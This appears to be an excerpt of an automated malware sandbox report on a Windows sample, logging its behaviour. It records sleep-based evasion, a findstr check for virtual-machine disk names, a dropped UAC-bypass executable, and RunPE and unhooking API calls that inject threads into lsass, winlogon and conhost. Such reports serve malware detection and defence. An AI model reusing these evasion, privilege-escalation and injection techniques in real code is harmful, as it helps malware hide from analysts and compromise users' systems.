        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084 Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348 Thread sleep count: 8131 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 1347 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008 Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 8472 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 469 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 8845 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956 Thread sleep count: 561 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484 Thread sleep time: -14757395258967632s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4100 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 8877 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 498 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172 Thread sleep time: -14757395258967632s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 8547 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900 Thread sleep count: 1003 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992 Thread sleep count: 35 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3600 Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152 Thread sleep count: 5442 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184 Thread sleep count: 107 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500 Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep count: 6183 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep count: 1570 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1384 Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1232 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\dllhost.exe TID: 6412 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\dllhost.exe TID: 4948 Thread sleep count: 158 > 30
        Source: C:\Windows\System32\dllhost.exe TID: 3976 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 3520 Thread sleep count: 251 > 30
        Source: C:\Windows\System32\lsass.exe TID: 2780 Thread sleep count: 43 > 30
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\explorer.exe Last function: Thread delayed
        Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
        Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
        Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
        Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
        Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8
        Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
        Source: cmd.exe, 0000002C.00000003.1584622401.0000015829838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" %
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdownLMEM XlH
        Source: cmd.exe, 00000008.00000003.1323937809.0000021406B8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
        Source: cmd.exe, 0000002C.00000003.1598274166.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597504148.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607297299.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1606177800.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597979208.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596938910.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597212934.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596620569.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607478751.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597899448.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1598713878.0000015829838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: e7WMhx18XN.exe, 00000001.00000002.1327169256.0000000001298000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_94-619
        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_95-542
        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_97-542
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF6CF6718E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_004019E1 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap,56_2_004019E1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF671A8C SetUnhandledExceptionFilter,12_2_00007FF6CF671A8C
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF671404 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF6CF671404
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF6CF6718E8
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
        Source: C:\Users\user\AppData\Local\Temp\paint.exe Memory allocated: C:\Windows\System32\conhost.exe base: 113DAF00000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 12BE3BE0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 21E7B340000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 236ACAA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,94_2_0000000140002434
        Source: C:\Users\user\AppData\Local\Temp\paint.exe Thread created: C:\Windows\System32\conhost.exe EIP: DAF00000
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: E3BE0000
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 7B340000
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: ACAA0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 780000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 800000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3B0000
        Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 60382EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C7342EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B91B2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 918F2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E962EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8D72EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 56DC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9CCD2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BAC02EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C9D2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1802EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B232EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27592EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9BDC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98F62EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD782EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2B82EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C1332EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4092EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F61C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 112C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1D2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12F62EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 115C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B4692EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9EBD2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6682EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 905C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5A8E2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC5B2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA182EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96182EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D0B72EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 55302EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 95822EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 54662EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D82EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83092EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB1C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CACC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6DEC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1CA2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E2272EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BED2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF342EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 87922EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CCCC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 61F22EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EEB32EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 637D2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1CC82EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6EF2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63182EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4B672EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B3B2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30FF2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5E02EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35402EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 916A2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C40A2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FD82EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81D2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3AC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8F82EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15782EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D0E2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E3B2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 693C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4CE2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 126F2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F17A2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F325AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10125AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5425AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C125AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14525AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D625AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C125AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7225AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13525AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11D25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8425AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14625AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7525AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5125AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5125AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13B25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DF25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10525AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BC25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14225AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10925AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10425AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
